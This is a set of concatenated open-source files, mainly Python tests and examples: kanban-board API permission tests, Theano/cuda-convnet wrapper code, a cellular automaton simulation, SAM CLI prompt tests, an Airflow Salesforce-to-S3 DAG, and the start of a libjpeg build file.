reverse("sort-column"), {"order": [col_done.id, col_done.id]}
)
assert response.status_code == 400
@pytest.mark.parametrize(
"post_data,expected_status_code",
[
({"order": [1, 2]}, 200),
({"order": [1, 1]}, 400),
({"order": [-1]}, 400),
({"order": "nope"}, 400),
({"order": {"asd"}}, 400),
({"other": "bad data"}, 400),
({}, 400),
],
)
def test_order_column_status_code(
post_data, expected_status_code, api_client_with_credentials, board
):
Column.objects.create(id=1, board=board, title="col1")
Column.objects.create(id=2, board=board, title="col2")
response = api_client_with_credentials.post(reverse("sort-column"), post_data)
assert response.status_code == expected_status_code
def test_board_list(api_client, steve, amy, leo):
uni_board = Board.objects.create(name="University", owner=steve)
uni_board.members.set([steve, amy])
get_board_list = lambda: api_client.get(reverse("board-list"))
# Not authenticated
response = get_board_list()
assert response.status_code == 401
# Owner can see his own boards
api_client.force_authenticate(user=steve)
response = get_board_list()
assert response.status_code == 200
assert len(response.data) == 1
    # Members can see their boards
api_client.force_authenticate(user=amy)
response = get_board_list()
assert response.status_code == 200
assert len(response.data) == 1
# Not part of any boards, can't see any
api_client.force_authenticate(user=leo)
response = get_board_list()
assert response.status_code == 200
assert len(response.data) == 0
def test_board_detail(api_client, steve, amy, leo):
uni_board = Board.objects.create(name="University", owner=steve)
uni_board.members.set([steve, amy])
get_uni_board_detail = lambda: api_client.get(
reverse("board-detail", kwargs={"pk": uni_board.id})
)
# Not authenticated
response = get_uni_board_detail()
assert response.status_code == 401
# Owner can see his own board
api_client.force_authenticate(user=steve)
response = get_uni_board_detail()
assert response.status_code == 200
assert response.data["name"] == "University"
# Member can see the board
api_client.force_authenticate(user=amy)
response = get_uni_board_detail()
assert response.status_code == 200
assert response.data["name"] == "University"
# Not part of the board, can't see it
api_client.force_authenticate(user=leo)
response = get_uni_board_detail()
assert response.status_code == 404
def test_board_delete(api_client, steve, amy, leo):
uni_board = Board.objects.create(name="University", owner=steve)
uni_board.members.set([steve, amy])
delete_uni_board = lambda: api_client.delete(
reverse("board-detail", kwargs={"pk": uni_board.id})
)
# Not authenticated
response = delete_uni_board()
assert response.status_code == 401
assert Board.objects.filter(id=uni_board.id).exists()
# Not part of the board, can't see it
api_client.force_authenticate(user=leo)
response = delete_uni_board()
assert response.status_code == 404
assert Board.objects.filter(id=uni_board.id).exists()
# Member can't delete the board
api_client.force_authenticate(user=amy)
response = delete_uni_board()
assert response.status_code == 403
assert Board.objects.filter(id=uni_board.id).exists()
    # Owner can delete the board
api_client.force_authenticate(user=steve)
response = delete_uni_board()
assert response.status_code == 204
assert not Board.objects.filter(id=uni_board.id).exists()
def test_board_create(api_client, steve, amy):
assert len(Board.objects.all()) == 0
create_board = lambda: api_client.post(reverse("board-list"), {"name": "Pets"})
# Not authenticated
response = create_board()
assert response.status_code == 401
assert len(Board.objects.all()) == 0
# Steve should be owner and member after creation
api_client.force_authenticate(user=steve)
response = create_board()
assert response.status_code == 201
assert len(Board.objects.all()) == 1
pets = Board.objects.get(name="Pets")
assert pets.owner == steve
assert list(pets.members.all()) == [steve]
# Amy should not see any boards
api_client.force_authenticate(user=amy)
response = api_client.get(reverse("board-list"))
assert response.status_code == 200
assert len(response.data) == 0
def test_board_invite_member(api_client, board_factory, steve, leo, amy):
board = board_factory(owner=steve)
board.members.set([leo, steve])
# Initially there are two members
assert len(board.members.all()) == 2
send_invite = lambda users_ids: api_client.post(
reverse("board-invite-member", kwargs={"pk": board.id}), {"users": users_ids}
)
# Not authenticated
response = send_invite([amy.id])
assert response.status_code == 401
assert len(board.members.all()) == 2
# Leo is not an owner and should not be able to invite others
api_client.force_authenticate(user=leo)
response = send_invite([amy.id])
assert response.status_code == 403
assert len(board.members.all()) == 2
# Steve as the owner should be able to successfully invite Amy
api_client.force_authenticate(user=steve)
response = send_invite([amy.id])
assert response.status_code == 200
assert len(board.members.all()) == 3
assert amy.id in list(map(lambda member: member.id, board.members.all()))
# Should handle adding an existing member
response = send_invite([steve.id])
assert response.status_code == 200
assert len(board.members.all()) == 3
    # Should handle adding a non-existent user
response = send_invite([-1])
assert response.status_code == 400
assert len(board.members.all()) == 3
def test_board_remove_member(
api_client, board_factory, column_factory, task_factory, steve, leo, amy, mike
):
board = board_factory(owner=steve)
board.members.set([steve, leo, amy])
column = column_factory(board=board)
task = task_factory(column=column)
    # Initially there are three members
assert len(board.members.all()) == 3
remove_member = lambda username: api_client.post(
reverse("board-remove-member", kwargs={"pk": board.id}), {"username": username}
)
# Not authenticated
response = remove_member(leo.username)
assert response.status_code == 401
assert len(board.members.all()) == 3
# Leo should not be able to remove Amy (Leo isn't the owner)
api_client.force_authenticate(user=leo)
response = remove_member(amy.username)
assert response.status_code == 403
assert len(board.members.all()) == 3
# Steve can't remove himself (the owner)
api_client.force_authenticate(user=steve)
response = remove_member(steve.username)
assert response.status_code == 400
assert len(board.members.all()) == 3
# Steve can't remove Mike (not a member of the board)
response = remove_member(mike.username)
assert response.status_code == 400
assert len(board.members.all()) == 3
    # Steve can't remove a non-existent user
response = remove_member("notvalidusername")
assert response.status_code == 400
assert len(board.members.all()) == 3
# Steve can remove Leo, should also remove Leo from tasks
task.assignees.set([leo])
assert len(task.assignees.all()) == 1
response = remove_member(leo.username)
assert response.status_code == 200
assert len(board.members.all()) == 2
assert leo.id not in list(map(lambda member: member.id, board.members.all()))
assert len(task.assignees.all()) == 0
def test_update_task_title(api_client, task_factory, steve, amy):
task = task_factory(title="Landing page design")
board = task.column.board
board.members.set([steve])
new_title = "Admin page permissions"
update_title = lambda: api_client.patch(
reverse("task-detail", kwargs={"pk": task.id}), {"title": new_title}
)
# Not authenticated
response = update_title()
assert response.status_code == 401
# Amy not a member, doesn't know about the task
api_client.force_authenticate(user=amy)
response = update_title()
assert response.status_code == 404
# Steve is a board member, can update
api_client.force_authenticate(user=steve)
response = update_title()
task.refresh_from_db()
assert response.status_code == 200
assert task.title == new_title
def test_delete_task(api_client, task_factory, steve, amy):
task = task_factory()
board = task.column.board
board.members.set([steve])
delete_task = lambda: api_client.delete(
reverse("task-detail", kwargs={"pk": task.id})
)
# Not authenticated
response = delete_task()
assert response.status_code == 401
# Amy not a member, doesn't know about the task
api_client.force_authenticate(user=amy)
response = delete_task()
assert response.status_code == 404
# Steve is a board member, can delete
api_client.force_authenticate(user=steve)
response = delete_task()
assert response.status_code == 204
assert not Task.objects.filter(id=task.id).exists()
def test_update_column_title(api_client, column_factory, steve, amy):
column = column_factory(title="On Hold")
board = column.board
board.members.set([steve])
new_title = "Ready"
update_column_title = lambda: api_client.patch(
reverse("column-detail", kwargs={"pk": column.id}), {"title": new_title}
)
# Not authenticated
response = update_column_title()
assert response.status_code == 401
# Amy not a member, doesn't know about the column
api_client.force_authenticate(user=amy)
response = update_column_title()
assert response.status_code == 404
# Steve is a board member, can update
api_client.force_authenticate(user=steve)
response = update_column_title()
column.refresh_from_db()
assert response.status_code == 200
assert column.title == new_title
def test_create_column(api_client, board_factory, steve, amy):
board = board_factory(name="Internals")
board.members.set([steve])
    column_data = {"title": "Send verification email on Register", "board": board.id}
create_column = lambda post_data: api_client.post(reverse("column-list"), post_data)
# Not authenticated
response = create_column(column_data)
assert response.status_code == 401
# Amy not a member
api_client.force_authenticate(user=amy)
response = create_column(column_data)
assert response.status_code == 400
assert response.data[0] == "Must be a member of the board!"
# Steve is a board member, can create
api_client.force_authenticate(user=steve)
response = create_column(column_data)
assert response.status_code == 201
assert Column.objects.filter(title=column_data["title"]).exists()
def test_create_task(api_client, column_factory, steve, amy):
column = column_factory(title="Blocked")
board = column.board
board.members.set([steve])
    task_data = {
        "title": "Send verification email on Register",
"description": "<p>Send a verification email when a new user registers. "
"Email template is provided by Dave.</p><p><br></p><p>Use our main SMTP provider.</p>",
"column": column.id,
"labels": [],
"assignees": [steve.id],
"priority": "H",
}
create_task = lambda post_data: api_client.post(reverse("task-list"), post_data)
# Not authenticated
response = create_task(task_data)
assert response.status_code == 401
# Amy not a member
assert amy not in board.members.all()
api_client.force_authenticate(user=amy)
response = create_task(task_data)
assert response.status_code == 400
assert response.data[0] == "Must be a member of the board!"
# One of the assignees (amy) is not a member
api_client.force_authenticate(user=steve)
response = create_task({**task_data, "assignees": [steve.id, amy.id]})
assert response.status_code == 400
assert response.data[0] == "Can't assign someone who isn't a board member!"
# Steve is a board member, can create
api_client.force_authenticate(user=steve)
response = create_task(task_data)
assert response.status_code == 201
assert Task.objects.filter(title=task_data["title"]).exists()
def test_only_board_members_see_labels(
api_client, board_factory, label_factory, steve, amy
):
board = board_factory(name="Internals")
board.members.set([steve])
label = label_factory(name="Documentation", board=board)
get_label = lambda: api_client.get(reverse("label-detail", kwargs={"pk": label.id}))
# Steve is a board member, can get label
api_client.force_authenticate(user=steve)
response = get_label()
assert response.status_code == 200
    # Amy is not a board member, doesn't know about the label
api_client.force_authenticate(user=amy)
response = get_label()
assert response.status_code == 404
def test_add_labels_to_task(
api_client, board_factory, column_factory, task_factory, label_factory, steve, amy
):
board1 = board_factory()
board1.members.set([steve])
board2 = board_factory()
column1 = column_factory(board=board1)
label1 = label_factory(board=board1)
label2 = label_factory(board=board2)
task1 = task_factory(column=column1)
add_labels = lambda labels: api_client.patch(
reverse("task-detail", kwargs={"pk": task1.id}), {"labels": labels}
)
# Can't add a label when not a member
api_client.force_authenticate(user=amy)
response = add_labels([label1.id])
task1.refresh_from_db()
assert response.status_code == 404
assert len(task1.labels.all()) == 0
# Can't add a label from a different board
api_client.force_authenticate(user=steve)
response = add_labels([label1.id, label2.id])
task1.refresh_from_db()
assert response.status_code == 400
assert response.data[0] == "Can't set a label that doesn't belong to the board!"
assert len(task1.labels.all()) == 0
# Can add a label of this board as member
api_client.force_authenticate(user=steve)
response = add_labels([label1.id])
task1.refresh_from_db()
assert response.status_code == 200
assert [label.id for label in task1.labels.all()] == [label1.id]
def test_label_names_unique_per_board(
api_client, board_factory, label_factory, steve, amy
):
board = board_factory()
board.members.set([steve])
label1 = label_factory(board=board, name="Hotfix")
label_factory(board=board, name="Bug")
api_client.force_authenticate(user=steve)
response = api_client.patch(
reverse("label-detail", kwargs={"pk": label1.id}), {"name": "Bug"}
)
assert response.status_code == 400
|
pylearn2/sandbox/cuda_convnet/base_acts.py
|
ikervazquezlopez/Pylearn2
| 2,045 |
69949
|
"""
Base class for wrapping cuda-convnet operations.
"""
__authors__ = "<NAME>"
__copyright__ = "Copyright 2010-2012, Universite de Montreal"
__credits__ = ["<NAME>", "<NAME>"]
__license__ = "3-clause BSD"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
"""
This module may contain code copied directly or modified from cuda-convnet.
The copyright and licensing notice for this code is reproduced below:
/*
* Copyright (c) 2011, <NAME> (<EMAIL>)
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
*
* - Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
*
* - Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
* LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
* CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
* SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
* INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
* CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
* NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
* EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
"""
import warnings
import theano
from theano.compat import get_unbound_function
from theano import config
from theano.sandbox.cuda import GpuOp
from pylearn2.sandbox.cuda_convnet.shared_code import this_dir
from pylearn2.sandbox.cuda_convnet.convnet_compile import convnet_available
from pylearn2.sandbox.cuda_convnet.convnet_compile import cuda_convnet_loc
from pylearn2.utils import py_integer_types
import pylearn2.sandbox.cuda_convnet.pthreads
class BaseActs(GpuOp):
"""
Shared code for wrapping various convnet operations.
"""
def __init__(self, pad=0, partial_sum=None, stride=1):
if not isinstance(pad, py_integer_types):
raise TypeError("pad must be an int")
if not (pad >= 0):
raise ValueError("bad value of pad (must be non-negative): " +
str(pad))
self.partial_sum = partial_sum
self.pad = pad
self.stride = stride
self.copy_non_contiguous = 0
# TODO: support sparse connectivity pattern
self.dense_connectivity = True
def c_header_dirs(self):
if config.pthreads.inc_dir:
return [this_dir, config.pthreads.inc_dir]
else:
return [this_dir]
def c_headers(self):
return ['nvmatrix.cuh', 'cudaconv2.cuh']
def c_code_cache_version(self):
warnings.warn("No C-code cache version for %s" %
self.__class__.__name__)
return ()
def c_lib_dirs(self):
if config.pthreads.lib_dir:
return [cuda_convnet_loc, config.pthreads.lib_dir]
else:
return [cuda_convnet_loc]
def c_libraries(self):
if config.pthreads.lib:
return ['cuda_convnet', config.pthreads.lib]
else:
return ['cuda_convnet']
def _argument_contiguity_check(self, arg_name):
return """
if (!CudaNdarray_is_c_contiguous(%%(%(arg_name)s)s))
{
if (!(%(class_name_caps)s_COPY_NON_CONTIGUOUS)) {
PyErr_SetString(PyExc_ValueError,
"%(class)s: %(arg_name)s must be C contiguous");
%%(fail)s;
}
}
""" % {
'class': self.__class__.__name__,
'arg_name': arg_name,
'class_name_caps': self.__class__.__name__.upper(),
}
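    # Note: the doubled "%%(...)s" markers in the template above survive the
    # "%"-substitution performed here and are later filled in by Theano's own
    # c_code substitution pass (e.g. %(fail)s), which is why the percent signs
    # are doubled in the source.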
def _argument_dimension_check(self, arg_name, ndim):
return """
if (%%(%(arg_name)s)s->nd != %(ndim)d)
{
PyErr_Format(PyExc_ValueError,
"%(arg_name)s must have ndim=%(ndim)d, got nd=%%%%i",
%%(%(arg_name)s)s->nd);
%%(fail)s;
}
""" % locals()
def __eq__(self, other):
return (type(self) == type(other) and
self.partial_sum == other.partial_sum and
self.pad == other.pad and
self.dense_connectivity == other.dense_connectivity and
self.stride == other.stride and
self.copy_non_contiguous == other.copy_non_contiguous)
def __hash__(self):
msg = []
msg.append(self.__class__.__name__)
for val in (self.partial_sum, self.pad, self.dense_connectivity,
self.stride, self.copy_non_contiguous):
msg.append(str(val))
return hash(tuple(msg))
# Make sure the cuda_convnet library is compiled and up-to-date
def make_thunk(self, *args, **kwargs):
if not convnet_available():
raise RuntimeError('Could not compile cuda_convnet')
return super(BaseActs, self).make_thunk(*args, **kwargs)
# This is needed because otherwise DebugMode would consider that
# BaseActs.make_thunk does something other than the default code, and
# would duplicate verification.
theano.compile.debugmode.default_make_thunk.append(
get_unbound_function(BaseActs.make_thunk))
class UnimplementedError(Exception):
"""
Like NotImplementedError, but designed not to be caught and suppressed
by theano.
"""
|
tests/test_yandex.py
|
termim/geocoder
| 1,506 |
69958
|
# coding: utf8
import geocoder
location = 'Ottawa'
coordinates = {'lat': 41.005407, 'lng': 28.978349}
def test_yandex():
g = geocoder.yandex(location)
assert g.ok
def test_yandex_reverse():
g = geocoder.yandex(coordinates, method='reverse')
assert g.ok
def test_multi_results():
g = geocoder.yandex(location, maxRows=3)
assert len(g) == 3
|
ca-hostpathogen.py
|
RachidStat/PyCX
| 176 |
69972
|
import pycxsimulator
from pylab import *
width = 50
height = 50
initProb = 0.01
infectionRate = 0.85
regrowthRate = 0.15
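# Cell states: 0 = empty site (a dead host), 1 = healthy host, 2 = infected host.
# Each step, infected hosts die, empty sites regrow next to healthy hosts with
# probability regrowthRate, and healthy hosts next to infected neighbors become
# infected with probability infectionRate.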
def initialize():
global time, config, nextConfig
time = 0
config = zeros([height, width])
for x in range(width):
for y in range(height):
if random() < initProb:
state = 2
else:
state = 1
config[y, x] = state
nextConfig = zeros([height, width])
def observe():
cla()
imshow(config, vmin = 0, vmax = 2, cmap = cm.jet)
axis('image')
title('t = ' + str(time))
def update():
global time, config, nextConfig
time += 1
for x in range(width):
for y in range(height):
state = config[y, x]
if state == 0:
for dx in range(-1, 2):
for dy in range(-1, 2):
if config[(y+dy)%height, (x+dx)%width] == 1:
if random() < regrowthRate:
state = 1
elif state == 1:
for dx in range(-1, 2):
for dy in range(-1, 2):
if config[(y+dy)%height, (x+dx)%width] == 2:
if random() < infectionRate:
state = 2
else:
state = 0
nextConfig[y, x] = state
config, nextConfig = nextConfig, config
pycxsimulator.GUI().start(func=[initialize, observe, update])
|
caffe2/python/db_test.py
|
KevinKecc/caffe2
| 585 |
69973
|
# Copyright (c) 2016-present, Facebook, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from caffe2.python import workspace
import os
import tempfile
import unittest
class TestDB(unittest.TestCase):
def setUp(self):
handle, self.file_name = tempfile.mkstemp()
os.close(handle)
self.data = [
(
"key{}".format(i).encode("ascii"),
"value{}".format(i).encode("ascii")
)
for i in range(1, 10)
]
def testSimple(self):
db = workspace.C.create_db(
"minidb", self.file_name, workspace.C.Mode.write)
for key, value in self.data:
transaction = db.new_transaction()
transaction.put(key, value)
del transaction
del db # should close DB
db = workspace.C.create_db(
"minidb", self.file_name, workspace.C.Mode.read)
cursor = db.new_cursor()
data = []
while cursor.valid():
data.append((cursor.key(), cursor.value()))
cursor.next() # noqa: B305
del cursor
db.close() # test explicit db closer
self.assertEqual(data, self.data)
|
testing/example_scripts/fixtures/fill_fixtures/test_extend_fixture_conftest_module/conftest.py
|
markshao/pytest
| 9,225 |
69983
|
import pytest
@pytest.fixture
def spam():
return "spam"
|
tests/unit/lib/cookiecutter/test_question.py
|
torresxb1/aws-sam-cli
| 859 |
70027
|
from typing import List, Union, Dict
from unittest import TestCase
from unittest.mock import ANY, patch, Mock
from parameterized import parameterized
from samcli.lib.cookiecutter.question import Question, QuestionKind, Choice, Confirm, Info, QuestionFactory
class TestQuestion(TestCase):
_ANY_TEXT = "any text"
_ANY_KEY = "any key"
_ANY_OPTIONS = ["option1", "option2", "option3"]
_ANY_ANSWER = "any answer"
_ANY_NEXT_QUESTION_MAP = {
"option1": "key1",
"option2": "key2",
"option3": "key3",
}
_ANY_DEFAULT_NEXT_QUESTION_KEY = "default"
_ANY_KIND = QuestionKind.question
def setUp(self):
self.question = Question(
text=self._ANY_TEXT,
key=self._ANY_KEY,
default=self._ANY_ANSWER,
is_required=True,
allow_autofill=False,
next_question_map=self._ANY_NEXT_QUESTION_MAP,
default_next_question_key=self._ANY_DEFAULT_NEXT_QUESTION_KEY,
)
def get_question_with_default_from_cookiecutter_context_using_keypath(
self, key_path: List[Union[str, Dict]]
) -> Question:
return Question(
text=self._ANY_TEXT,
key=self._ANY_KEY,
default={"keyPath": key_path},
is_required=True,
next_question_map=self._ANY_NEXT_QUESTION_MAP,
default_next_question_key=self._ANY_DEFAULT_NEXT_QUESTION_KEY,
)
def test_creating_questions(self):
q = Question(text=self._ANY_TEXT, key=self._ANY_KEY)
self.assertEqual(q.text, self._ANY_TEXT)
self.assertEqual(q.key, self._ANY_KEY)
self.assertEqual(q.default_answer, "")
self.assertFalse(q.required)
self.assertEqual(q.next_question_map, {})
self.assertIsNone(q.default_next_question_key)
q = self.question
self.assertEqual(q.text, self._ANY_TEXT)
self.assertEqual(q.key, self._ANY_KEY)
self.assertEqual(q.default_answer, self._ANY_ANSWER)
self.assertTrue(q.required)
self.assertEqual(q.next_question_map, self._ANY_NEXT_QUESTION_MAP)
self.assertEqual(q.default_next_question_key, self._ANY_DEFAULT_NEXT_QUESTION_KEY)
def test_question_key_and_text_are_required(self):
with (self.assertRaises(TypeError)):
Question(text=self._ANY_TEXT)
with (self.assertRaises(TypeError)):
Question(key=self._ANY_KEY)
def test_get_next_question_key(self):
self.assertEqual(self.question.get_next_question_key("option1"), "key1")
self.assertEqual(self.question.get_next_question_key("option2"), "key2")
self.assertEqual(self.question.get_next_question_key("option3"), "key3")
self.assertEqual(self.question.get_next_question_key("any-option"), self._ANY_DEFAULT_NEXT_QUESTION_KEY)
self.question.set_default_next_question_key("new_default")
self.assertEqual(self.question.get_next_question_key(None), "new_default")
@patch("samcli.lib.cookiecutter.question.click")
def test_ask(self, mock_click):
mock_click.prompt.return_value = self._ANY_ANSWER
answer = self.question.ask({})
self.assertEqual(answer, self._ANY_ANSWER)
mock_click.prompt.assert_called_once_with(text=self.question.text, default=self.question.default_answer)
@patch("samcli.lib.cookiecutter.question.click")
def test_ask_resolves_from_cookiecutter_context(self, mock_click):
# Setup
expected_default_value = Mock()
previous_question_key = "this is a question"
previous_question_answer = "this is an answer"
context = {
"['x', 'this is an answer']": expected_default_value,
previous_question_key: previous_question_answer,
}
question = self.get_question_with_default_from_cookiecutter_context_using_keypath(
["x", {"valueOf": previous_question_key}]
)
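        # The {"valueOf": previous_question_key} entry resolves to that
        # question's answer, and the stringified resolved key path
        # ("['x', 'this is an answer']") is what the context dict above is
        # keyed on, so expected_default_value should be offered as the default.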
# Trigger
question.ask(context=context)
# Verify
mock_click.prompt.assert_called_once_with(text=self.question.text, default=expected_default_value)
@patch("samcli.lib.cookiecutter.question.click")
def test_ask_resolves_from_cookiecutter_context_non_exist_key_path(self, mock_click):
# Setup
context = {}
question = self.get_question_with_default_from_cookiecutter_context_using_keypath(["y"])
# Trigger
question.ask(context=context)
# Verify
mock_click.prompt.assert_called_once_with(text=self.question.text, default=None)
def test_ask_resolves_from_cookiecutter_context_non_exist_question_key(self):
# Setup
expected_default_value = Mock()
previous_question_key = "this is a question"
previous_question_answer = "this is an answer"
context = {
"['x', 'this is an answer']": expected_default_value,
previous_question_key: previous_question_answer,
}
question = self.get_question_with_default_from_cookiecutter_context_using_keypath(
["x", {"valueOf": "non_exist_question_key"}]
)
# Trigger
with self.assertRaises(KeyError):
question.ask(context=context)
@parameterized.expand([("this should have been a list"), ([1],), ({},)])
def test_ask_resolves_from_cookiecutter_context_with_key_path_not_a_list(self, key_path):
# Setup
context = {}
question = self.get_question_with_default_from_cookiecutter_context_using_keypath(key_path)
# Trigger
with self.assertRaises(ValueError):
question.ask(context=context)
@parameterized.expand([({"keyPath123": Mock()},), ({"keyPath": [{"valueOf123": Mock()}]},)])
def test_ask_resolves_from_cookiecutter_context_with_default_object_missing_keys(self, default_object):
# Setup
context = {}
question = self.get_question_with_default_from_cookiecutter_context_using_keypath([])
question._default_answer = default_object
# Trigger
with self.assertRaises(KeyError):
question.ask(context=context)
def test_question_allow_autofill_with_default_value(self):
q = Question(text=self._ANY_TEXT, key=self._ANY_KEY, is_required=True, allow_autofill=True, default="123")
        self.assertEqual("123", q.ask())
@patch("samcli.lib.cookiecutter.question.click")
def test_question_allow_autofill_without_default_value(self, click_mock):
answer_mock = click_mock.prompt.return_value = Mock()
q = Question(text=self._ANY_TEXT, key=self._ANY_KEY, is_required=True, allow_autofill=True)
        self.assertEqual(answer_mock, q.ask())
class TestChoice(TestCase):
def setUp(self):
self.question = Choice(
text=TestQuestion._ANY_TEXT,
key=TestQuestion._ANY_KEY,
options=TestQuestion._ANY_OPTIONS,
default=TestQuestion._ANY_ANSWER,
is_required=True,
next_question_map=TestQuestion._ANY_NEXT_QUESTION_MAP,
default_next_question_key=TestQuestion._ANY_DEFAULT_NEXT_QUESTION_KEY,
)
def test_create_choice_question(self):
self.assertEqual(self.question.text, TestQuestion._ANY_TEXT)
self.assertEqual(self.question.key, TestQuestion._ANY_KEY)
self.assertEqual(self.question._options, TestQuestion._ANY_OPTIONS)
with (self.assertRaises(TypeError)):
Choice(key=TestQuestion._ANY_KEY, text=TestQuestion._ANY_TEXT)
with (self.assertRaises(ValueError)):
Choice(key=TestQuestion._ANY_KEY, text=TestQuestion._ANY_TEXT, options=None)
with (self.assertRaises(ValueError)):
Choice(key=TestQuestion._ANY_KEY, text=TestQuestion._ANY_TEXT, options=[])
def test_get_options_indexes_with_different_bases(self):
indexes = self.question._get_options_indexes()
self.assertEqual(indexes, [0, 1, 2])
indexes = self.question._get_options_indexes(base=1)
self.assertEqual(indexes, [1, 2, 3])
@patch("samcli.lib.cookiecutter.question.click.Choice")
@patch("samcli.lib.cookiecutter.question.click")
def test_ask(self, mock_click, mock_choice):
mock_click.prompt.return_value = 2
answer = self.question.ask({})
        self.assertEqual(answer, TestQuestion._ANY_OPTIONS[1])  # subtract one: the prompt is 1-based, the options list is 0-based
mock_click.prompt.assert_called_once_with(
text="Choice",
default=self.question.default_answer,
show_choices=False,
type=ANY,
show_default=self.question.default_answer is not None,
)
mock_choice.assert_called_once_with(["1", "2", "3"])
class TestInfo(TestCase):
@patch("samcli.lib.cookiecutter.question.click")
def test_ask(self, mock_click):
q = Info(text=TestQuestion._ANY_TEXT, key=TestQuestion._ANY_KEY)
mock_click.echo.return_value = None
answer = q.ask({})
self.assertIsNone(answer)
mock_click.echo.assert_called_once_with(message=q.text)
class TestConfirm(TestCase):
@patch("samcli.lib.cookiecutter.question.click")
def test_ask(self, mock_click):
q = Confirm(text=TestQuestion._ANY_TEXT, key=TestQuestion._ANY_KEY)
mock_click.confirm.return_value = True
answer = q.ask({})
self.assertTrue(answer)
mock_click.confirm.assert_called_once_with(text=q.text)
class TestQuestionFactory(TestCase):
def test_there_is_a_handler_for_each_question_kind(self):
question_json = {"key": TestQuestion._ANY_KEY, "question": TestQuestion._ANY_TEXT, "options": ["a", "b"]}
for kind in QuestionKind:
question_json["kind"] = kind.name
q = QuestionFactory.create_question_from_json(question_json)
expected_type = QuestionFactory.question_classes[kind]
self.assertTrue(isinstance(q, expected_type))
|
airflow/providers/amazon/aws/example_dags/example_salesforce_to_s3.py
|
ChaseKnowlden/airflow
| 15,947 |
70070
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
This is a basic example DAG for using `SalesforceToS3Operator` to retrieve Salesforce customer
data and upload to an S3 bucket.
"""
from datetime import datetime
from airflow import DAG
from airflow.providers.amazon.aws.operators.s3_copy_object import S3CopyObjectOperator
from airflow.providers.amazon.aws.operators.s3_delete_objects import S3DeleteObjectsOperator
from airflow.providers.amazon.aws.transfers.salesforce_to_s3 import SalesforceToS3Operator
BASE_PATH = "salesforce/customers"
FILE_NAME = "customer_daily_extract_{{ ds_nodash }}.csv"
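# "{{ ds_nodash }}" is rendered by Airflow's templating at runtime to the run's
# logical date without dashes (e.g. 20210708), so each daily run writes its own file.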
with DAG(
dag_id="example_salesforce_to_s3_transfer",
schedule_interval="@daily",
start_date=datetime(2021, 7, 8),
catchup=False,
default_args={"retries": 1, "aws_conn_id": "s3"},
tags=["example"],
default_view="graph",
) as dag:
# [START howto_operator_salesforce_to_s3_transfer]
upload_salesforce_data_to_s3_landing = SalesforceToS3Operator(
task_id="upload_salesforce_data_to_s3",
salesforce_query="SELECT Id, Name, Company, Phone, Email, LastModifiedDate, IsActive FROM Customers",
s3_bucket_name="landing-bucket",
s3_key=f"{BASE_PATH}/{FILE_NAME}",
salesforce_conn_id="salesforce",
replace=True,
)
# [END howto_operator_salesforce_to_s3_transfer]
date_prefixes = "{{ execution_date.strftime('%Y/%m/%d') }}"
store_to_s3_data_lake = S3CopyObjectOperator(
task_id="store_to_s3_data_lake",
source_bucket_key=upload_salesforce_data_to_s3_landing.output,
dest_bucket_name="data_lake",
dest_bucket_key=f"{BASE_PATH}/{date_prefixes}/{FILE_NAME}",
)
delete_data_from_s3_landing = S3DeleteObjectsOperator(
task_id="delete_data_from_s3_landing",
bucket=upload_salesforce_data_to_s3_landing.s3_bucket_name,
keys=upload_salesforce_data_to_s3_landing.s3_key,
)
store_to_s3_data_lake >> delete_data_from_s3_landing
# Task dependencies created via `XComArgs`:
# upload_salesforce_data_to_s3_landing >> store_to_s3_data_lake
|
deps/libjpeg/libjpeg.gyp
|
jiabinf/node-phash
| 131 |
70071
|
{
'includes': [ '../common.gyp' ],
'targets': [
{
'target_name': 'libjpeg',
'type': 'static_library',
'include_dirs': [
'.',
],
'sources': [
'ckconfig.c',
'jcapimin.c',
'jcapistd.c',
'jccoefct.c',
'jccolor.c',
'jcdctmgr.c',
'jchuff.c',
'jcinit.c',
'jcmainct.c',
'jcmarker.c',
'jcmaster.c',
'jcomapi.c',
'jcparam.c',
'jcphuff.c',
'jcprepct.c',
'jcsample.c',
'jctrans.c',
'jdapimin.c',
'jdapistd.c',
'jdatadst.c',
'jdatasrc.c',
'jdcoefct.c',
'jdcolor.c',
'jddctmgr.c',
'jdhuff.c',
'jdinput.c',
'jdmainct.c',
'jdmarker.c',
'jdmaster.c',
'jdmerge.c',
